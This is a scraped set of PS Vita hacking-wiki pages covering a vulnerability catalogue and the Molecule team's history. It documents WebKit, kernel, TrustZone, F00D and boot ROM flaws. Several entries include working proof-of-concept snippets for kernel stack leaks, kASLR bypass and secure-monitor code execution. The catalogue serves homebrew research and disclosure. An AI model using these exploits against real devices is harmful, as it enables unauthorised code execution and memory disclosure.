    /* The SMC reads from (tz_addr + 0x28); with tz_addr = 0x00560000 that is 0x00400028 as seen by the Non-secure Kernel */<br />
    memcpy((void *)0x00400028, src, 8);<br />
<br />
    /* sm_handle is (tz_addr >> 1); shared_mem_index selects the 0x80-byte slot the result is written to */<br />
    register uintptr_t r0 asm("r0") = 0x00560000 >> 1;<br />
    register uintptr_t r1 asm("r1") = (dst - 0x00560000) / 0x80;<br />
<br />
    asm volatile(<br />
        "movw r12, #0x12F\n\t"   /* SMC number; movw because 0x12F is not an ARM modified immediate */<br />
        "smc #0\n\t"<br />
        : "+r"(r0), "+r"(r1)<br />
        :<br />
        : "r12", "memory"<br />
    );<br />
}<br />
</source><br />
<br />
To achieve code execution, dst is set to the SMC table address so that the 8 bytes plant two pointers (8 = 2 * 4 bytes).<br />
<br />
Patched somewhere after 1.80 and before 2.10.<br />
<br />
== Hardware ==<br />
<br />
=== DMAC5 crypto engine allows partial AES key overwrite ===<br />
<br />
(2017-02-01) The Dmac5 crypto engine, accessible from the kernel, allows writing 4 bytes of key material at a time. This makes it possible to recover plaintext AES keys via brute force.<ref>https://yifan.lu/2017/02/19/psvimgtools-decrypt-vita-backups/</ref><br />
<br />
=== Bigmac leaves result of previous AES operation in the internal buffer allowing for derived key recovery ===<br />
<br />
(2017-04-21) See https://lolhax.org/2019/01/02/extracting-keys-f00d-crumbs-raccoon-exploit/<br />
<br />
=== Boot ROM ===<br />
<br />
(2019-08-30) The development boot ROM does not check the [[Enc]] header correctly. Specifically, the "code size" field (at offset 0x10) is only checked after it has been added to "offset to code". The addition can overflow, for example when <code>code_size == -offset_code</code>. Further, when loading an Enc binary from ARM, the size to copy in is calculated as <code>(scratch->code_size + scratch->offset_code) - 0x40</code>. With the sum of code_size and offset_code being 0, this calculation underflows to -0x40, i.e. 0xffffffc0, resulting in a huge amount of data being copied in and overwriting parts of the boot ROM.<br />
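<br />
As an added illustration (not code from the wiki or from the boot ROM), the check ordering described above modelled in C: the flawed sum-then-check beside a hardened version that bounds each field first. The struct layout and the <code>SCRATCH_MAX</code> bound are assumptions made for this example.<br />

```c
#include <stdint.h>
#include <stdio.h>

/* Model of the Enc header check described above. Field names, the 0x40 header size
 * and the overflowing expressions come from the wiki text; the struct layout and the
 * SCRATCH_MAX bound are assumptions made for this example, not the real boot ROM's. */
#define ENC_HEADER_SIZE 0x40u
#define SCRATCH_MAX     0x10000u   /* assumed capacity of the load buffer */

struct enc_scratch {
    uint32_t offset_code;  /* "offset to code" field */
    uint32_t code_size;    /* "code size" field (at header offset 0x10) */
};

/* Constructed sample headers (not real Enc data). The crafted one has
 * code_size == -offset_code, so the two fields sum to 0 in 32-bit arithmetic. */
const struct enc_scratch benign_enc_header  = { 0x40u,   0x200u      };
const struct enc_scratch crafted_enc_header = { 0x1000u, 0xFFFFF000u };

/* Flawed ordering: the sum is formed first and only the sum is bounds-checked.
 * For the crafted header the sum wraps to 0, passes, and the copy length
 * (sum - 0x40) underflows to 0xffffffc0. Returns the copy length the loader
 * would use, or 0 when the header is rejected. */
uint32_t enc_copy_len_flawed(const struct enc_scratch *s)
{
    uint32_t end = s->code_size + s->offset_code;   /* may wrap */
    if (end > SCRATCH_MAX)
        return 0;                                   /* rejected */
    return end - ENC_HEADER_SIZE;                   /* may underflow */
}

/* Hardened ordering: bound each field before combining them, and phrase the
 * combined check as a subtraction that cannot wrap. Returns the copy length,
 * or -1 when the header is rejected. */
int64_t enc_copy_len_checked(const struct enc_scratch *s)
{
    if (s->offset_code < ENC_HEADER_SIZE || s->offset_code > SCRATCH_MAX)
        return -1;
    /* SCRATCH_MAX - offset_code cannot wrap because offset_code <= SCRATCH_MAX */
    if (s->code_size > SCRATCH_MAX - s->offset_code)
        return -1;
    return (int64_t)(s->offset_code + s->code_size - ENC_HEADER_SIZE);
}

int main(void)
{
    printf("benign : flawed=0x%x checked=%lld\n",
           enc_copy_len_flawed(&benign_enc_header),
           (long long)enc_copy_len_checked(&benign_enc_header));
    printf("crafted: flawed=0x%x checked=%lld\n",
           enc_copy_len_flawed(&crafted_enc_header),
           (long long)enc_copy_len_checked(&crafted_enc_header));
    return 0;
}
```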
<br />
== F00D Processor ==<br />
<br />
=== octopus exploit ===<br />
<br />
(2017-02-18) The f00d secure_kernel module loading does not check the source address and therefore provides an oracle allowing for a memory dump. See https://teammolecule.github.io/35c3-slides/<br />
<br />
Fixed in 1.80.<br />
<br />
=== Heap buffer overflow in update_service_sm ===<br />
<br />
(2017-02-23) A heap buffer overflow exists in update_service_sm.<ref>https://yifan.lu/2019/01/11/the-first-f00d-exploit/</ref><br />
<br />
=== Petite Mort ===<br />
<br />
(2018-07-27) jebaited, not an exploit. Just [https://github.com/TeamMolecule/petite-mort tools used to glitch bootrom].<br />
<br />
=== F00D exception vectors reused as SLSK load buffer ===<br />
<br />
(2018-07-27) When an [[Enc]] is loaded by the bootrom, it is first read to <code>0x40000</code>, which is the uncached alias of <code>0x800000</code> (both are F00D-only private memory), and later decrypted to the final address it is executed from. However, <code>0x40000</code> is also where the exception vectors lie. By the time the SLSK is read, the exception vectors are stale and therefore the memory is considered safe to reuse. Interrupts are disabled, so we cannot use those. Exceptions, however, cannot be disabled in hardware. Unfortunately, there is no way to trigger any exception from bootrom code (which is why Sony thought it would be safe to reuse the buffer). Below is a summary of all the exceptions and why they cannot be triggered.<br />
<br />
{| class="wikitable"<br />
! Exception<br />
! Offset<br />
! Reason<br />
|-<br />
| Reset<br />
| 0x0<br />
| Requires hardware reset signal<br />
|-<br />
| NMI<br />
| 0x4<br />
| Requires hardware NMI signal<br />
|-<br />
| RI<br />
| 0x8<br />
| No reserved instructions used<br />
|-<br />
| ZDIV<br />
| 0xC<br />
| DIV/DIVU instructions are used in one place but safe from /0 bugs<br />
|-<br />
| BRK<br />
| 0x10<br />
| BRK instruction not used<br />
|-<br />
| SWI<br />
| 0x14<br />
| SWI/STC instructions not used<br />
|-<br />
| DSP<br />
| 0x18<br />
| No DSP unit<br />
|-<br />
| COP<br />
| 0x1C<br />
| No coprocessor unit<br />
|}<br />
<br />
However, through [[Glitching]], we can inject a fault in either the decoding or execution units of the processor and trigger one of these exceptions. By writing a fake ENC file that actually masquerades as a F00D exception handler table whose entries all point to our payload, we can execute F00D code at bootrom time (before the bootrom is unmapped). This is a very desirable glitching target because it requires almost no precision (any instruction anywhere can be "corrupted" into something that triggers an exception) and allows for "spray and pray" style glitch attacks. In practice, we found this target to have an insanely high success rate.<br />
<br />
In the bootrom there are two SLSK load paths. The first one is used at initial boot to read [[Second Loader]] from the eMMC. In this path, the minimum payload size is 0x200 bytes because at most 1 eMMC block must be read. The second path is used in early boot to read the [[Secure Kernel]] ENC which is loaded from the [[SLB2]] partition by ARM TZ processor to volatile memory. This second path is more difficult to reach because it requires a handshake between F00D ("you are allowed to reset me") and ARM TZ ("I am going to reset F00D"). However, as long as both F00D and ARM TZ are pwned post-boot, the second path can be triggered.<br />
<br />
The advantage of the first path is that it is easier and faster to trigger (always hits on first boot). The disadvantages are that it corrupts the first 0x200 bytes of F00D memory (which we might want to dump) and that it requires "bricking" the device (because second loader is replaced by our payload). Note that with a proper hardware flasher and a backup beforehand, it is possible to unbrick a corrupted second loader.<br />
<br />
The advantage of the second path is that it does not require a hardware flasher and that it only corrupts 0x40 bytes of F00D memory. The disadvantage is that it requires more work to trigger (code execution both in ARM TZ and F00D) and it takes longer to trigger (since you have to boot the system to a point where you can pwn F00D and ARM TZ).<br />
<br />
== References ==<br />
<references/><br />
<br />
[[Category:Vulnerabities]]</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Molecule&diff=11490Molecule2019-09-05T14:26:57Z<p>Xyz: Reverted edits by CelesteBlue (talk) to last revision by Yifan Lu</p>
<hr />
<div>[[File:Molecule.png|frame|Team logo]] The Molecule team was the first to hack the Vita and was responsible for the majority of the reversing work done on the Vita.<br />
<br />
== History ==<br />
<br />
=== F00D ===<br />
<br />
[[Secure Kernel]] was dumped 02/2017 (through octopus exploit) and [[Boot ROM]] was dumped on 08/2018 (through [[Glitching]]).<ref>https://teammolecule.github.io/35c3-slides/</ref><br />
<br />
=== Non Secure Kernel Bootloader - enso ===<br />
<br />
In the PSP and PS3 scenes, the commonly accepted definition of a CFW was that it had to be reboot-proof. Molecule achieved this on PSVita by exploiting a vulnerability in the NSKBL eMMC init code.<br />
<br />
=== Plugins API - taiHEN ===<br />
<br />
Davee wanted a powerful API for patching the PSVita OS, making it more of a custom firmware.<br />
<br />
[https://yifan.lu/2016/11/01/taihen-cfw-framework-for-ps-vita/ Yifan's writeup]<br />
<br />
[https://www.lolhax.org/2016/11/02/the-vision-behind-taihen/ Davee's writeup]<br />
<br />
=== HENkaku ===<br />
<br />
On 29/07/2016 HENkaku was released: http://henkaku.xyz/<br />
<br />
HENkaku enables homebrew by patching out signature checks (works similarly to [[SceKernelModulemgr#Module_decryption_and_signature_checks]]). HENkaku uses two kernel vulnerabilities: [[Vulnerabilities#Heap_use-after-free_in_sceNetSyscallIoctl]] and [[Vulnerabilities#sceIoDevctl_does_not_clear_stack_buffer]], and a usermode WebKit vulnerability. HENkaku only works on firmware 3.60; however, the kernel vulnerabilities are present in all firmware versions up to and including 3.60.<br />
<br />
=== Rejuvenate ===<br />
<br />
On 14/06/2015, Rejuvenate, the first public exploit that allowed running unsigned usermode code, was released: http://yifan.lu/2015/06/14/rejuvenate-native-homebrew-for-psvita/<br />
<br />
=== Secure Kernel ===<br />
<br />
It was no surprise that crypto processes were not handled by the kernel (such was the case for previous Sony consoles). Libraries that deal with encrypted/signed content ([[Self Loading|SELF loading]], [[PUP]] unpacking, etc.) all make calls to the [[Secure World]]. The hypothesis was that, like many large manufacturers at the time, Sony used the secure world for cryptography and security tasks. Getting access to the secure kernel was even harder than the non-secure kernel because there was much less exposure and much less information. However, with a vulnerability that abused some lightly documented features of the ARM architecture, the secure kernel was dumped on 06/09/2014, a little less than a year after owning the kernel. Unfortunately, almost immediately, the team found that the secure kernel was a red herring. There were no keys or other sensitive information in the secure world (Sony was wiser here than most other ARM device makers); the sole task of the secure kernel was to communicate with an external processor, which the team named [[F00D Processor]] because of the <code>e_machine</code> field of the ELF headers.<br />
<br />
=== Kernel ===<br />
<br />
For about a year research was focused on getting kernel code execution. Through some ingenuity and a lot of luck, on 27/08/2013 the first kernel exploit on the Vita was realized. The vulnerability was an integer overflow leading to a heap overflow, and a misconfiguration that allowed a small portion of kernel heap memory to be leaked. The exploit and tools were completed on 01/09/2013 and, for the first time, kernel memory was revealed. After a week of dumping the large kernel codebase (there were many factors that made it a slow process), work began in parallel to reverse the system and find more vulnerabilities.<br />
<br />
=== Userland ===<br />
<br />
On 18/08/2012, a vulnerability was discovered in [[PSM]] that allowed both for memory to be dumped and code to be executed.<ref>[https://www.youtube.com/watch?v=w1GICNXTOhM&list=UUNIviKniCqbDShbAvldEOtA First memory dump]</ref> [[UVLoader]] was developed and in a couple of weeks the first working native code homebrew ran, on 12/09/2012. Although the source for UVLoader was released in anticipation of excitement in the homebrew community, there was no serious response from developers. Unfortunately, Sony used the source for UVLoader to secure the system in later updates and make userland code loading a much harder reality.<br />
<br />
=== ROP ===<br />
<br />
In early 2012, the first ROP exploit was achieved through the [[Web Browser]]. Memory dumps of the browser were obtained through a disclosed WebKit vulnerability that was not patched because Sony did not use the most up-to-date WebKit version. The same vulnerability allowed ROP code execution. [[ROPTool]] was written to make creation and testing of ROP payloads easy.<br />
<br />
=== PSP ===<br />
<br />
Molecule has done some work on PSP in the past. Initial reversing of the [[PSP Emulator]] was done by members of Molecule including the first flash0 dump that opened the door for all future PSP emulator hacks.<br />
<br />
<references/><br />
<br />
[[Category:Vulnerabities]]</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Vulnerabilities&diff=11480Vulnerabilities2019-09-02T01:27:09Z<p>Xyz: /* Heap buffer overflow in update_service_sm */</p>
<hr />
<div>== Userland ==<br />
<br />
=== WebKit exploits ===<br />
<br />
==== WebKit exploits in Email app ====<br />
<br />
Implemented by xyz in order for HENkaku to be launched offline.<br />
<br />
See [https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup].<br />
<br />
==== WebKit 531.22.8 (Vita FW <= 1.81) ====<br />
<br />
There are two exploits used for WebKit prior to 2.00. One is a data leakage exploit, CVE-2010-4577,<ref>https://code.google.com/p/chromium/issues/detail?id=63866</ref> using type confusion to treat a double as a string memory address and length. The other is a type confusion exploit, CVE-2010-1807, on the parseFloat() function using a NaN as the argument.<br />
<ref>http://imthezuk.blogspot.com/2010/11/float-parsing-use-after-free.html</ref><br />
<br />
==== WebKit 536.26 (Vita FW 2.00-3.20) (CVE-2012-3748) (PSA 2013-09-03-1) ====<br />
<br />
Ported to PSVita by many people. Patched on FW 3.30.<br />
<br />
The heap memory buffer overflow vulnerability exists within WebKit's JavaScriptCore JSArray::sort(...) method. This method accepts a user-defined JavaScript function and calls it from native code to compare array items. If this compare function reduces the array length, the trailing array items are written outside the "m_storage->m_vector[]" buffer, which leads to heap memory corruption.<br />
<br />
[http://packetstormsecurity.com/files/123088/ Packet Storm Exploit 2013-0903-1 - Apple Safari Heap Buffer Overflow]<br />
<br />
[https://bitbucket.org/DaveeFTW/psvita-260-webkit/src/master/ exploit code by Davee]<br />
<br />
==== WebKit 537.73 (as used in Vita FW 3.30-3.36) (CVE-2014-1303) ====<br />
<br />
Ported to PSVita by xyz. Patched on FW 3.50.<br />
<br />
The CSSSelectorList can be mutated after it is allocated. If the mutated list contains fewer entries than the original one, a restricted 1-bit OOB write can be achieved.<br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not.PDF</ref><br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not-WP.pdf</ref><br />
<ref>https://cansecwest.com/slides/2015/Liang_CanSecWest2015.pdf</ref><br />
<br />
==== WebKit 537.73 (as used in Vita FW 3.50-3.60) (JSArray::sortCompactedVector) ====<br />
<br />
Discovered by xyz. Implemented in HENkaku by Molecule Team. Patched in FW 3.61 (see [https://blog.xyz.is/2016/webkit-360.html#bonus-how-sony-patched-it how it was patched]).<br />
<br />
The JSArray::sort method has a heap use-after-free vulnerability. If an array containing an object with a custom toString method is sorted, and the toString method causes the array to be reallocated, then the sorted elements will be written to the old freed address.<br />
<br />
[https://blog.xyz.is/2016/webkit-360.html xyz's writeup about 3.60 webkit exploit]<br />
<br />
[https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup about ROP in webbrowser]<br />
<br />
[https://github.com/henkaku/henkaku/blob/master/webkit/exploit.js 3.60 webkit exploit source code by xyz]<br />
<br />
[https://gist.github.com/St4rk/f1375a22dad6e5bbcff8067fdf26600f 3.60 webkit exploit commented code by St4rk]<br />
<br />
==== WebKit 537.73 (Vita FW 3.30-3.71) (to be disclosed) ====<br />
<br />
Will be released at the same time as xyz's next kernel exploit, named 2050 and 2051.<br />
<br />
Working on <= 3.71. Not patched yet.<br />
<br />
=== PSM (PlayStation Mobile) exploits ===<br />
<br />
PSM apps for PSVita were removed from the PSStore in 2015. Nevertheless, a set of tricks allows installing and using PSM on any PSVita on FW <=3.51.<br />
<br />
PSM apps can't work on FW >=3.52 because they are blacklisted in PSVita OS. This can be bypassed only with a kernel exploit and ref00d plugin.<br />
<br />
==== PSM Dev For Unity can be installed without PSStore ====<br />
<br />
PSM Dev For Unity is packed into a DRM-free .pkg. It can therefore be installed using PKG Installer or the BGDL .pkg trick. Not patchable.<br />
<br />
==== PSM+ ====<br />
<br />
The PSM developer license can be spoofed using filesystem write access and signed with keys.<br />
<br />
==== PSM Mono privilege escalation ====<br />
<br />
See [https://yifan.lu/2015/06/21/hacking-the-ps-vita/ writeup by yifan lu].<br />
<br />
==== PSM Unity privilege escalation ====<br />
<br />
UnityEngine.dll is a trusted assembly (SecurityCritical) and is not signed (can be modified). However, the actual file at <code>ux0:app/PCSI00009/managed/UnityEngine.dll</code> is [[PFS]] signed and encrypted, making this (and any) resource based hacks just as difficult as unsigned code execution hacks (which is the original goal).<br />
<br />
==== PSM NetworkRequest privilege escalation ====<br />
<br />
NetworkRequest.BeginGetResponse(AsyncCallback callback) invokes callback with <code>SecurityCritical</code> allowing for a privilege escalation. Unfortunately, Sony closed down the scoreboards feature <ref>http://community.eu.playstation.com/t5/Announcements-Events/PSM-scoreboard-service-is-closing/td-p/21263959</ref> which means that Network.AuthGetTicket() fails and Network.CreateRequest() cannot be invoked. There is no other way of creating a NetworkRequest object.<br />
<br />
<source lang="csharp"><br />
using System;<br />
using System.Security;<br />
using System.Runtime.InteropServices;<br />
using Sce.PlayStation.Core.Services;<br />
<br />
namespace NetHax<br />
{<br />
    public class AppMain<br />
    {<br />
        // Invoked as the BeginGetResponse callback, which the runtime calls with SecurityCritical<br />
        [SecurityCritical]<br />
        public static void Escalate (IAsyncResult result)<br />
        {<br />
            Console.WriteLine("Should be SecurityCritical");<br />
            // Unmanaged allocation is only permitted from SecurityCritical code<br />
            IntPtr ptr = Marshal.AllocHGlobal(1000);<br />
            Console.WriteLine("Look at me allocating memory: 0x{0:X}", ptr.ToInt64());<br />
        }<br />
<br />
        public static void Main (string[] args)<br />
        {<br />
            Network.Initialize("af1c0a1b-a7b8-4597-a022-eee91e6735d1");<br />
            Network.AuthGetTicket(); // fails since the scoreboard service was shut down<br />
            NetworkRequest req = Network.CreateRequest(NetworkRequestType.Get, "", "");<br />
            IAsyncResult result = req.BeginGetResponse(new AsyncCallback(Escalate));<br />
            while (!result.IsCompleted)<br />
            {<br />
                Console.WriteLine("waiting...");<br />
            }<br />
            Console.WriteLine("Completed!");<br />
        }<br />
    }<br />
}<br />
</source><br />
<br />
=== Game savedata exploits ===<br />
<br />
Discovered in 2015 by TheFlow. Released on 2018-06-29.<br />
<br />
This sort of exploit works in theory on any firmware (not patchable, or only with difficulty).<br />
<br />
==== Savedata exploits VS WebKit exploits ====<br />
<br />
h-encore uses a different entry point than its predecessor HENkaku. Instead of a WebKit exploit, it uses a gamesave exploit. The reason is that after firmware 3.30 or so, Sony introduced [[SceKernelModulemgr#sceKernelInhibitLoadingModule|sceKernelInhibitLoadingModule]]() in their browser, which prevented us from loading additional sysmodules. This limitation is crucial, since loading sysmodules was the only way we could get more syscalls than the browser uses, as syscall numbers are randomized at boot and only assigned to syscall slots if some user module imports them. h-encore needs to load SceNgsUser, a sysmodule vulnerable to kexploits.<br />
<br />
==== Old games do not have ASLR ====<br />
<br />
The reason a gamesave exploit is possible on such a system is that games developed with SDK 2.60 and lower were compiled as statically linked executables, so their loading address is always the same, namely 0x81000000, and they cannot be relocated to another region. They also don't have stack protection enabled by default, which means that if we can smash the stack in such a game, we can happily do ROP.<br />
<br />
==== Method for finding a savedata bug ====<br />
<br />
Looking for gamesave exploits is a boring process: you just fuzz gamesaves by writing random stuff at random locations until you get a crash (the best bet is extending strings and hoping that you can smash the stack).<br />
<br />
==== Bittersmile game buffer overflow (h-encore) ====<br />
<br />
Bittersmile game found exploitable on 2018-02-17 by Freakler. Implemented in h-encore by TheFloW.<br />
<br />
The bug lies in the parser of the bittersmile game. The gamesave is actually a text file, and the game reads it line by line and copies the lines to a list of buffers. However, it doesn't validate the length, so if we put the delimiter \n far enough away that the line is longer than the buffer can hold, we get a classic buffer overflow.<br />
If this buffer were on the stack, we could overwrite the return address and directly execute our ROP chain. However, it is in the data section, but luckily for us the content after the buffer is the list that holds the destinations for the other lines. This means that if we overflow into the list and redirect a buffer pointer, we can copy the next line to wherever we want, which gives us an arbitrary write primitive.<br />
<br />
Not patchable. Bittersmile game requires minimal FW ?2.50? to run.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#buffer-overflow h-encore writeup by TheFloW]<br />
<br />
=== PSP Emulator escape ===<br />
<br />
See [https://theofficialflow.github.io/2019/06/18/trinity.html#psp-emulator-escape Trinity writeup by TheFloW].<br />
<br />
==== Why hack the PSP Emulator? Why not WebKit/games? ====<br />
<br />
The PSP Emulator runs at system privileges which are equivalent to root. By gaining control over the emulator, we are exposed to almost ALL syscalls, unlike the WebKit process that is sandboxed. Similarly, the previous jailbreak h-encore exploited a gamesave vulnerability such that it could invoke the NGS syscalls.<br />
<br />
==== Buffer overflow in ScePspemuRemoteNet-KERMIT_CMD_ADHOC_CREATE ====<br />
<br />
Discovered on 2018-05-26 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#stack-smash writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
==== CSC does not sanity-check the row number (arbitrary userland memory read) ====<br />
<br />
Discovered on 2018-06-04 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#csc-arbitrary-read writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
== System ==<br />
<br />
=== PSVita can use PSP/PS3 PSStore licenses ===<br />
<br />
PSVita can use .rif downloaded from PSVita, PSP, or PS3 (ReStore by CelesteBlue).<br />
<br />
PSVita can use PSP or PS3 act.dat if we spoof ConsoleId (idps) and OpenPSID (ReNpDrm by CelesteBlue).<br />
<br />
This means that however much Sony secures the PSVita store, we will always be able to activate as long as the PS3 store is not secure.<br />
<br />
=== PSStore Activation server does not check challenge anymore ===<br />
<br />
Since May 2018, the challenge string in requests sent from PSVita to PSN for Content and PSN Account activations is not checked anymore server-side.<br />
<br />
This means that to activate a PSVita, we only have to spoof the firmware version to bypass the FW Update popup, and spoof a recent PSN passcode key in SceShell. Both are done by taiHEN (in henkaku.suprx). This also means ReStore and ReNpDrm are not needed anymore.<br />
<br />
== Kernel ==<br />
<br />
=== Syscall handler doesn't check syscall number (integer overflow) ===<br />
<br />
Discovered on 2015-07-03 by Molecule Team.<br />
<br />
A large syscall number passed in R12 can index past the end of the syscall table and cause an arbitrary function pointer to be dereferenced and executed.<br />
<br />
Tested on 1.50. Patched on 1.61.<br />
<br />
=== syscall handler leaks syscall table vaddr ===<br />
<br />
Calling a syscall with an invalid syscall id ends the SVC handler without clearing the syscall table virtual address left in r0, leaking it to the caller.<br />
<br />
Tested on 1.50. Patched on 1.61.<br />
<br />
=== Stack buffer overflow in sceSblDmac5EncDec ===<br />
<br />
Discovered on 2014-09-16 by Molecule Team. Implemented in xyz's 1.61 exploit chain in 2016, then in CelesteBlue's QuickHEN_PSVITA.<br />
<br />
[[SceSblSsMgr#sceSblDmac5EncDec|SceSblDmac5Mgr_sceSblDmac5EncDec]]<br />
<br />
<pre><br />
This function:<br />
reads in 0x18 bytes from first arg<br />
processes a little<br />
then:<br />
ROM:005F711A MOV R1, R11<br />
ROM:005F711C ADD R0, SP, #0x88+var_70<br />
ROM:005F711E MOV.W R2, R10,LSR#3<br />
ROM:005F7122 BLX _import_SceSblSsMgr_SceSysmemForDriver_sceKernelMemcpyUserToKernelForDriver<br />
R10 comes from original read in buffer+0x10<br />
</pre><br />
<br />
Tested on 1.61. Patched on 1.80. They also added an IsShell check.<br />
<br />
=== Kernel stack leak in sceIoDevctl ===<br />
<br />
Discovered on 2014-11-24 by Molecule Team. Used in HENkaku by Molecule Team.<br />
<br />
Tested successfully on firmware 0.995 in fself. Since at least firmware 1.030, it works only via webkit (not fself nor games but maybe ePSP or PSM) exploits.<br />
<br />
Call some functions that interest you in a kernel context (call some damn syscalls, for example sceIoOpen).<br />
Then call sceIoDevctl and get up to 0x3FF bytes of that stack!<br />
<br />
<source lang="C"><br />
#include <string.h><br />
<br />
// make a buffer, tagged with 0x66 bytes so untouched regions are recognisable in the dump<br />
char outbuf[0x400];<br />
memset(outbuf, 0x66, sizeof(outbuf));<br />
<br />
sceIoOpen("molecule0:", 0, 0); // populate the kernel stack with data from a syscall<br />
<br />
// kernel stack leak to outbuf: up to 0x3FF bytes are copied out without being cleared<br />
sceIoDevctl("sdstor0:", 5, "xmc-lp-ign-userext", 0x14, outbuf, 0x3FF);<br />
<br />
// check if our data was actually written to outbuf<br />
hex_dump("kstack", (unsigned char*) outbuf, 0x400);<br />
</source><br />
<br />
Fixed in 3.61.<br />
<br />
=== Heap use-after-free in sceNetSyscallIoctl ===<br />
<br />
Discovered on 2016-04-05 by Molecule Team. Implemented in HENkaku by Molecule Team.<br />
<br />
See [https://blog.xyz.is/2016/vita-netps-ioctl.html xyz's writeup].<br />
<br />
sceNetSyscallIoctl is declared as <code>int sceNetSyscallIoctl(int s, unsigned flags, void *umem)</code>. When <code>memsz = (flags_ >> 16) & 0x1FFF</code> is in range (0x80; 0x1000], it will use SceNetPs custom malloc to allocate a buffer of that size on the heap.<br />
<br />
However, the second argument to malloc is 0, meaning that when not enough memory is available instead of returning NULL, it unlocks the global SceNetPs mutex and waits on a semaphore.<br />
<br />
Then, while malloc is waiting, another thread can free the socket sceNetSyscallIoctl is operating on, causing a use-after-free condition.<br />
<br />
When passed proper arguments, sceNetSyscallIoctl will execute a function from the socket's vtable at the end:<br />
<br />
<source lang ="C"><br />
v13 = (*(int (__fastcall **)(int, signed int, unsigned int, char *))(*(_DWORD *)(socket + 24) + 28))(<br />
socket,<br />
11,<br />
flags_,<br />
mem_);<br />
</source><br />
<br />
Fixed in 3.63. See [https://blog.xyz.is/2017/363-fix.html how it was fixed].<br />
<br />
=== 3 kernel exploits on DevKit by TheFloW ===<br />
<br />
Patched on 3.68 or on a firmware shortly before. These exploits are not usable on retail/testkit because the functions used are exported only by DevKit modules.<br />
<br />
==== Kernel stack leak in sceMotionDevGetEvaInfo ====<br />
<br />
This can be used to defeat kernel ASLR on DevKit on FW < 3.68.<br />
<br />
<source lang="C"><br />
uint32_t get_sysmem_base() {<br />
uint32_t info[0x12];<br />
<br />
// 1) Call a function that writes sp to kernel stack<br />
sceAppMgrLoadExec(NULL, NULL, NULL);<br />
<br />
// 2) Leak kernel stack<br />
sceMotionDevGetEvaInfo(info);<br />
<br />
// 3) Get sysmem base<br />
uint32_t sysmem_addr = info[0] & 0xFFFFF000;<br />
<br />
return sysmem_addr;<br />
}<br />
</source><br />
<br />
==== sceNgsVoiceDefinitionGetPresetInternal can read kernel memory ====<br />
<br />
See full exploit code by TheFloW [https://gist.github.com/TheOfficialFloW/92d4c2ad84b325019f68bc1c57cc64e2 here].<br />
<br />
Also reimplemented by CelesteBlue [https://github.com/CelesteBlue-dev/PSVita-RE-tools/blob/master/Kdumper/src/main.c#L342 here].<br />
<br />
==== sceKernelGetMutexInfo_089 can write into kernel memory ====<br />
<br />
No PoC available.<br />
<br />
=== SceNgs design flaws (h-encore) ===<br />
<br />
Discovered on 2018-02-04 by TheFloW and successfully exploited four days later. Released on 2018-06-29 in h-encore by TheFloW.<br />
<br />
Should be exploitable at least on 3.00 and up to 3.68. Fixed in 3.69.<br />
<br />
Some functions in [[SceNgs]] take a kernel pointer (xor'ed with a known static value) from the user.<br />
<br />
This can be used to partially defeat kASLR and also as an out-of-bounds exploit to get kernel execution.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md Writeup] and [https://github.com/TheOfficialFloW/h-encore source code].<br />
<br />
==== Kernel stack address leak using sceNgsRackGetRequiredMemorySize ====<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#getting-the-kernel-stack-base-address Write-up about h-encore kstack leak].<br />
<br />
IMPORTANT: On old firmwares (at least until firmware 1.692) the voice definition address must not be xored or SCE_NGS_ERROR_INVALID will be returned by the sceNgsRackGetRequiredMemorySize function.<br />
<br />
Below is a working implementation tested on firmware 0.995 and 1.692 (using the 1.692 DEVCTL_STACK_FRAME allows getting the kstack address faster on that firmware).<br />
<br />
<source lang="cpp"><br />
#define DEVCTL_STACK_FRAME 0x728 // value specific to 1.692<br />
<br />
SceInt32 gRet = 0;<br />
<br />
// exploit and ROP code by TheFloW - C code by LemonHaze<br />
SceUInt32 findkstackaddr(SceNgsHSynSystem synSys, SceUInt32 paramsize)<br />
{<br />
    SceInt32 ret = 0;<br />
<br />
    SceNgsRackDescription rackDesc;<br />
    rackDesc.nChannelsPerVoice = 1;<br />
    rackDesc.nVoices = 1;<br />
    rackDesc.nMaxPatchesPerInput = 0;<br />
    rackDesc.nPatchesPerOutput = 1;<br />
<br />
    // Fake voice definition, pushed onto the kernel stack through sceIoDevctl<br />
    unsigned int voiceDef[0x400];<br />
    memset(voiceDef, 0x00, sizeof(voiceDef));<br />
    voiceDef[0] = SCE_NGS_VOICE_DEFINITION_MAGIC;<br />
    voiceDef[1] = SCE_NGS_VOICE_DEFINITION_FLAGS;<br />
    voiceDef[2] = 0x40;<br />
    voiceDef[3] = 0x40;<br />
    sceIoDevctl("", 0, voiceDef, 0x3FF, NULL, 0);<br />
<br />
    sceKernelDelayThread(2 * 1000 * 1000);<br />
<br />
    // Probe candidate kernel stack addresses one page at a time: only the page holding<br />
    // the planted definition returns something other than SCE_NGS_ERROR_INVALID_PARAM<br />
    for (unsigned int addr = DEVCTL_STACK_FRAME; addr < 0x3000000; addr += 0x1000)<br />
    {<br />
        rackDesc.pVoiceDefn = (struct SceNgsVoiceDefinition*)(addr);<br />
        ret = sceNgsRackGetRequiredMemorySize(synSys, &rackDesc, &paramsize);<br />
        gRet = ret;<br />
        if (ret == SCE_NGS_ERROR_INVALID_PARAM)<br />
            continue;<br />
        else<br />
            return (addr - DEVCTL_STACK_FRAME);<br />
    }<br />
    return 0xFFFFFFF;<br />
}<br />
</source><br />
<br />
=== 2 memcpy bugs (used in h-encore) ===<br />
<br />
Discovered by TheFloW.<br />
<br />
Should be exploitable on any firmware up to 3.69. Could even be vulnerable at other levels (TrustZone?, NS KBL?).<br />
<br />
